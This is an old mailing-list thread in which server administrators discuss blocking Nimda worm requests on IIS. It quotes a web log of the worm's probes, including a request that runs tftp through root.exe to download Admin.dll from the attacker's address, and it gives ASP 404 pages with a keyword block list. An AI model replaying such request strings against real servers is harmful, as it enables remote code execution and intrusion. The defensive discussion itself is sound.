Dear Ron:
I tried to implement the code you mentioned below but it seems i am still
getting some of those bad requests... see here..
this is the log file from imail server (standalone that is running win2k
server and IIS 5.0 with your your ezsignup utility.
20010927 033141 216.254.88.229, , , GET /scripts/root.exe?/c+dir HTTP/1.0
20010927 033142 216.254.88.229, , , GET
/scripts/root.exe?/c+tftp%20-i%20216.254.88.229%20GET%20Admin.dll%20Admin.dl
l HTTP/1.0
20010927 033142 216.254.88.229, , , GET /scripts/Admin.dll HTTP/1.0
20010927 033143 216.254.88.229, , , GET /MSADC/root.exe?/c+dir HTTP/1.0
any ideas, maybe i havn't configured it properly? I revised the code a bit
to redirect to the home page after 5 seconds... could that cause it?
here is my "version"
<%
myRequest=Request.ServerVariables("QUERY_STRING")
'A list of filenames virus looks for or in this case to protect
myBadList="cmd.exe,root.exe,admin.dll,default.ida,.exe,.dll,.ida,.htr,.print
er"
'Detect a GET request from the Nimda virus and take appropriate action
arrBadString=Split(myBadList,",")
for i=0 to UBound(arrBadString)
if inStr(myRequest,arrBadString(i))>0 then
'turn offending server back on itself
Response.redirect "http://127.0.0.1";
end if
next
%>
<HTML>
<HEAD>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<SCRIPT LANGUAGE="JAVASCRIPT">
var timerID="";
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.1">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<SCRIPT LANGUAGE="JAVASCRIPT1.2">
function loadPage()
{
clearTimeout(timerID);
window.location.href="/";
}
</SCRIPT>
<a href="/">Home Page</a>.
</HEAD>
<BODY BGCOLOR="#000000">
<BR><BR><BR><BR><BR>
<CENTER><STRONG><EM>
<FONT COLOR="#FFFF00" SIZE="+2">sorry..., that page is missing or has been
moved, <br>redirecting to home page.</FONT>
</EM></STRONG></CENTER>
<SCRIPT LANGUAGE="JAVASCRIPT">
timerID=setTimeout("loadPage()", 4500);
</SCRIPT>
</BODY>
</HTML>
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Ron
Hornbaker
Sent: Friday, September 21, 2001 12:11 PM
To: [EMAIL PROTECTED]
Subject: RE: [imail] IIS Judo against Nimda's DoS attacks (was Fwd:
[isp-linux] Buaaa Haaa Ha Haaaaaaaaa...)
Great tip, Len. Here's the IIS version... just create a file in your web
root called something like "Custom404.asp", with this content (customize
the friendly part as much as you wish):
<%
'Custom404.asp page to thwart Nimda DoS attacks on IIS
'by Humankind Systems, Inc. http://hksi.net/
'No support or guarantees of any kind are granted with this
'code. Use at your own risk. Distribute freely.
'Get the entire URL requested
myRequest=Request.ServerVariables("QUERY_STRING")
'Detect a GET request from the Nimda virus and take appropriate action
if inStr(myRequest,"cmd.exe")>0 OR inStr(myRequest,"root.exe")>0 then
'turn offending server back on itself
Response.redirect "http://127.0.0.1";
end if
%>
<html>
<head>
<title>Page Not Found</title>
</head>
<body>
Sorry, but that page was not found on our server.
<p>
Here is a link back to our <a href="/">Home Page</a>.
</body>
</html>
Then go into your IIS properties on the default web site, to Custom
Errors, and customize the 404 error to use a URL. Enter "/Custom404.asp"
as the custom error. Test your server by entering URLs that won't be
found, and then enter some containing "cmd.exe" or "root.exe" in them.
This has the added benefit of being much smaller, kb-wise, than the
default 404 error page.
Ron Hornbaker
President/CTO
. . . . . . . . . . . . http://humankindsystems.com
. . . . . . . . . . . . w e c o d e. w e c a r e.
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of Len
> Conrad
> Sent: Friday, September 21, 2001 1:44 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
> Subject: [imail] Fwd: [isp-linux] Buaaa Haaa Ha Haaaaaaaaa...
>
>
> Below is a "judo" trick, using HTTP redirection for Apache, to
> deflect the
> nimda GETs back to the attacker.
>
> I suppose some of you MS aces could try to come up with
> equivalent for IIS?
>
> Len
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
______________________________________________________________________
The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
To Manage your Subscription......... http://humankindsystems.com/lists
